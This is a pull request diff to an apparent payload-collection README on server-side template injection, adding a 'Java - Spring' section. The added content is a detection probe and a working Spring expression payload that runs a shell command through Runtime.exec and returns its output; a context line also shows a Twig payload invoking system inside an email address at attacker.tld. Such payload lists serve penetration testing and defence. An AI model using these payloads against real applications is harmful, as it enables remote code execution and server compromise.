Merge pull request #592 from oddrabbit/patch-1

Added in Spring Framework SSTI Detection & Exploitation

Server Side Template Injection/README.md

@@ -72,7 +72,8 @@
     - [Twig - Template format](#twig---template-format)
     - [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
     - [Twig - Code execution](#twig---code-execution)
-  - [Java - Velocity](#velocity)
+  - [Java - Velocity](#java---velocity)
+  - [Java - Spring](#java---spring)
   - [PHP - patTemplate](#pattemplate)
   - [PHP - PHPlib](#phplib-and-html_template_phplib)
   - [PHP - Plates](#plates)
@@ -950,7 +951,7 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
 
 ---
 
-## Velocity
+## Java - Velocity
 
 [Official website](https://velocity.apache.org/engine/1.7/user-guide.html)
 > Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code.
@@ -968,6 +969,16 @@ $str.valueOf($chr.toChars($out.read()))
 
 ---
 
+
+## Java - Spring
+
+```python
+*{7*7}
+*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
+```
+
+---
+
 ## patTemplate
 
 > [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts